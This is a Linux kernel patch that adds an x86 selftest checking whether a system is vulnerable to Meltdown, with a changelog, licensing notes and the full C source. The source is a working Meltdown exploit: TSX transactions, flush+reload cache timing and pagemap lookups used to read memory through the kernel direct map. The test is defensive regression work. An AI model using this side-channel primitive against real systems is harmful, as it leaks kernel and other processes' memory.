To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added. This selftest is based on https://github.com/IAIK/meltdown. What this test does is to firstly set a predefined string at a random user address and then with pagemap, get the physical address of this string. Finally, try to fetch the data using kernel's directmap address for this physical address to see if user space can use kernel's page table. Per my tests, this test works well on CPUs that have TSX support. For this reason, this selftest only works on CPUs that supports TSX. This test requires the knowledge of direct map base. IAIK used the following two methods to get direct map base: 1 through a kernel module to show phys_to_virt(0); 2 by exploiting the same HW vulnerability to guess the base. Method 1 makes running this selftest complex while method 2 is not reliable and I do not want to use a possibly wrong value to run this test. Suggestions are welcome. Tested on both x86_64 and i386_pae VMs on a host with i7-7700K cpu, success rate is about 50% when nopti kernel cmdline is used. As for legal stuff: Add an Intel copyright notice because of a significant contribution to this code. This also makes it clear who did the relicensing from Zlib to GPLv2. Also, just to be crystal clear, I have included my Signed-off-by on this contribution because I certify that (from submitting-patches.rst): (b) The contribution is based upon previous work that, to the best of my knowledge, is covered under an appropriate open source license and I have the right under that license to submit that work with modifications, whether created in whole or in part by me, under the same open source license (unless I am permitted to submit under a different license), as indicated in the file; or In this case, I have the right under the license to submit this work. That license also permits me to relicense to GPLv2 and submit under the new license. I came to the conclusion that this work is OK to submit with all of the steps I listed above (copyright notices, license terms and relicensing) by strictly following all of the processes required by my employer. This does not include a Signed-off-by from a corporate attorney. Instead, I offer the next best thing: an ack from one of the maintainers of this code who can also attest to this having followed all of the proper processes of our employer. [dhansen: advice on changelog of the legal part] Signed-off-by: Aaron Lu <aaron.lu@xxxxxxxxx> Acked-by: Dave Hansen <dave.hansen@xxxxxxxxxxxxxxx> # Intel licensing process --- v3: address legal related concerns raised from Greg KH by adding Intel copyright in the header and explain in the changelog, no code change. tools/testing/selftests/x86/Makefile | 2 +- tools/testing/selftests/x86/meltdown.c | 420 +++++++++++++++++++++++++ 2 files changed, 421 insertions(+), 1 deletion(-) create mode 100644 tools/testing/selftests/x86/meltdown.c diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \ - syscall_arg_fault fsgsbase_restore sigaltstack + syscall_arg_fault fsgsbase_restore sigaltstack meltdown TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..0ad4b65adcd0 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,420 @@ +// SPDX-License-Identifier: GPL-2.0-only +/* + * Copyright (c) 2022 Intel + * + * This selftest is based on code from https://github.com/IAIK/meltdown + * and can be used to check if user space can read data through kernel + * page table entries. + * + * Note for i386 test: due to kernel prefer to use high memory for user + * programs, it is necessary to restrict the available memory under that + * of low memory size(around ~896MiB) so that the memory hosting "string" + * in main() is directly mapped. + * + * Note for both x86_64 and i386 test: the hardware race window can not be + * exploited 100% each time so a single run of the test on a vulnerable system + * may not FAIL. My tests on a i7-7700K cpu have a success rate about 50%. + * + * The original copyright and license information are shown below: + * + * Copyright (c) 2018 meltdown + * + * This software is provided 'as-is', without any express or implied + * warranty. In no event will the authors be held liable for any damages + * arising from the use of this software. + * + * Permission is granted to anyone to use this software for any purpose, + * including commercial applications, and to alter it and redistribute it + * freely, subject to the following restrictions: + * + * 1. The origin of this software must not be misrepresented; you must not + * claim that you wrote the original software. If you use this software + * in a product, an acknowledgment in the product documentation would be + * appreciated but is not required. + * + * 2. Altered source versions must be plainly marked as such, and must not be + * misrepresented as being the original software. + * + * 3. This notice may not be removed or altered from any source + * distribution. + */ + +#include <fcntl.h> +#include <unistd.h> +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <string.h> +#include <cpuid.h> +#include <errno.h> +#include <err.h> +#include <sys/mman.h> +#include <sys/utsname.h> + +#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1)) + +#define _XBEGIN_STARTED (~0u) + +/* configurables */ +#define NR_MEASUREMENTS 3 +#define NR_TRIES 10000 + +size_t cache_miss_threshold; +unsigned long directmap_base; + +static int get_directmap_base(void) +{ + char *buf; + FILE *fp; + size_t n; + int ret; + + fp = fopen("/sys/kernel/debug/page_tables/kernel", "r"); + if (!fp) + return -1; + + buf = NULL; + ret = -1; + while (getline(&buf, &n, fp) != -1) { + if (!strstr(buf, "Kernel Mapping")) + continue; + + if (getline(&buf, &n, fp) != -1 && + sscanf(buf, "0x%lx", &directmap_base) == 1) { + printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK); + directmap_base &= PUD_MASK; + ret = 0; + break; + } + } + + fclose(fp); + free(buf); + return ret; +} + +/* + * Requires root due to pagemap. + */ +static int virt_to_phys(unsigned long virt, unsigned long *phys) +{ + unsigned long pfn; + uint64_t val; + int fd, ret; + + fd = open("/proc/self/pagemap", O_RDONLY); + if (fd == -1) { + printf("[INFO]\tFailed to open pagemap\n"); + return -1; + } + + ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t)); + if (ret == -1) { + printf("[INFO]\tFailed to read pagemap\n"); + goto out; + } + + if (!(val & (1ULL << 63))) { + printf("[INFO]\tPage not present according to pagemap\n"); + ret = -1; + goto out; + } + + pfn = val & ((1ULL << 55) - 1); + if (pfn == 0) { + printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n"); + ret = -1; + goto out; + } + + ret = 0; + *phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1)); + +out: + close(fd); + return ret; +} + +static uint64_t rdtsc() +{ + uint64_t a = 0, d = 0; + + asm volatile("mfence"); +#ifdef __x86_64__ + asm volatile("rdtsc" : "=a"(a), "=d"(d)); +#else + asm volatile("rdtsc" : "=A"(a)); +#endif + a = (d << 32) | a; + asm volatile("mfence"); + + return a; +} + +#ifdef __x86_64__ +static void maccess(void *p) +{ + asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax"); +} + +static void flush(void *p) +{ + asm volatile("clflush 0(%0)\n" : : "c"(p) : "rax"); +} + +#define MELTDOWN \ + asm volatile("1:\n" \ + "movzx (%%rcx), %%rax\n" \ + "shl $12, %%rax\n" \ + "jz 1b\n" \ + "movq (%%rbx,%%rax,1), %%rbx\n" \ + : \ + : "c"(virt), "b"(array) \ + : "rax"); +#else +static void maccess(void *p) +{ + asm volatile("movl (%0), %%eax\n" : : "c"(p) : "eax"); +} + +static void flush(void *p) +{ + asm volatile("clflush 0(%0)\n" : : "c"(p) : "eax"); +} + +#define MELTDOWN \ + asm volatile("1:\n" \ + "movzx (%%ecx), %%eax\n" \ + "shl $12, %%eax\n" \ + "jz 1b\n" \ + "mov (%%ebx,%%eax,1), %%ebx\n" \ + : \ + : "c"(virt), "b"(array) \ + : "eax"); +#endif + +static void detect_flush_reload_threshold() +{ + size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000; + size_t dummy[16]; + size_t *ptr = dummy + 8; + uint64_t start = 0, end = 0; + + maccess(ptr); + for (i = 0; i < count; i++) { + start = rdtsc(); + maccess(ptr); + end = rdtsc(); + reload_time += (end - start); + } + + for (i = 0; i < count; i++) { + start = rdtsc(); + maccess(ptr); + end = rdtsc(); + flush(ptr); + flush_reload_time += (end - start); + } + + reload_time /= count; + flush_reload_time /= count; + + printf("[INFO]\tFlush+Reload: %zd cycles, Reload only: %zd cycles\n", + flush_reload_time, reload_time); + cache_miss_threshold = (flush_reload_time + reload_time * 2) / 3; + printf("[INFO]\tFlush+Reload threshold: %zd cycles\n", cache_miss_threshold); +} + +static int flush_reload(void *ptr) +{ + uint64_t start, end; + + start = rdtsc(); + maccess(ptr); + end = rdtsc(); + + flush(ptr); + + if (end - start < cache_miss_threshold) + return 1; + + return 0; +} + +static int check_tsx() +{ + if (__get_cpuid_max(0, NULL) >= 7) { + unsigned a, b, c, d; + __cpuid_count(7, 0, a, b, c, d); + return (b & (1 << 11)) ? 1 : 0; + } else + return 0; +} + +static unsigned int xbegin(void) +{ + unsigned int status; + + asm volatile("xbegin 1f \n 1:" : "=a"(status) : "a"(-1UL) : "memory"); + asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00" : "=a"(status) : "a"(-1UL) : "memory"); + + return status; +} + +static void xend(void) +{ + asm volatile("xend" ::: "memory"); + asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory"); +} + +static int __read_phys_memory_tsx(unsigned long phys, char *array) +{ + unsigned long virt; + int i, retries; + + virt = phys + directmap_base; + for (retries = 0; retries < NR_TRIES; retries++) { + if (xbegin() == _XBEGIN_STARTED) { + MELTDOWN; + xend(); + } + + for (i = 1; i < 256; i++) { + if (flush_reload(array + i * PAGE_SIZE)) + return i; + } + } + + return 0; +} + +/* + * Read physical memory by exploiting HW bugs. + * One byte a time. + */ +static int read_phys_memory(unsigned long phys, char *array) +{ + char res_stat[256]; + int i, r, max_v, max_i; + + memset(res_stat, 0, sizeof(res_stat)); + + for (i = 0; i < NR_MEASUREMENTS; i++) { + for (i = 0; i < 256; i++) + flush(array + i * PAGE_SIZE); + + r = __read_phys_memory_tsx(phys, array); + if (r != 0) + res_stat[r]++; + } + + max_v = 0; + for (i = 1; i < 256; i++) { + if (res_stat[i] > max_v) { + max_i = i; + max_v = res_stat[i]; + } + } + + if (max_v == 0) + return 0; + + return max_i; +} + +#ifdef __i386 +/* 32 bits version is only meant to run on a PAE kernel */ +static int arch_test_mismatch(void) +{ + struct utsname buf; + + if (uname(&buf) == -1) { + printf("[SKIP]\tCan't decide architecture\n"); + return 1; + } + + if (!strncmp(buf.machine, "x86_64", 6)) { + printf("[SKIP]\tNo need to run 32bits test on 64bits host\n"); + return 1; + } + + return 0; +} +#else +static int arch_test_mismatch(void) +{ + return 0; +} +#endif + +static int test_meltdown(void) +{ + char string[] = "test string"; + char *array, *result; + unsigned long phys; + int i, len, ret; + + if (arch_test_mismatch()) + return 0; + + if (get_directmap_base() == -1) { + printf("[SKIP]\tFailed to get directmap base. Make sure you are root and kernel has CONFIG_PTDUMP_DEBUGFS\n"); + return 0; + } + + detect_flush_reload_threshold(); + + if (!check_tsx()) { + printf("[SKIP]\tNo TSX support\n"); + return 0; + } + + if (virt_to_phys((unsigned long)string, &phys) == -1) { + printf("[FAIL]\tFailed to convert virtual address to physical address\n"); + return -1; + } + + len = strlen(string); + result = malloc(len + 1); + if (!result) { + printf("[FAIL]\tNot enough memory for malloc\n"); + return -1; + } + memset(result, 0, len + 1); + + array = mmap(NULL, 256 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (!array) { + printf("[FAIL]\tNot enough memory for mmap\n"); + free(result); + return -1; + } + memset(array, 0, 256 * PAGE_SIZE); + + for (i = 0; i < len; i++, phys++) { + result[i] = read_phys_memory(phys, array); + if (result[i] == 0) + break; + } + + ret = !strncmp(string, result, len); + if (ret) + printf("[FAIL]\tSystem is vulnerable to meltdown.\n"); + else + printf("[OK]\tSystem might not be vulnerable to meltdown.\n"); + + munmap(array, 256 * PAGE_SIZE); + free(result); + + return ret; +} + +int main(void) +{ + printf("[RUN]\tTest if system is vulnerable to meltdown\n"); + + return test_meltdown(); +} -- 2.38.1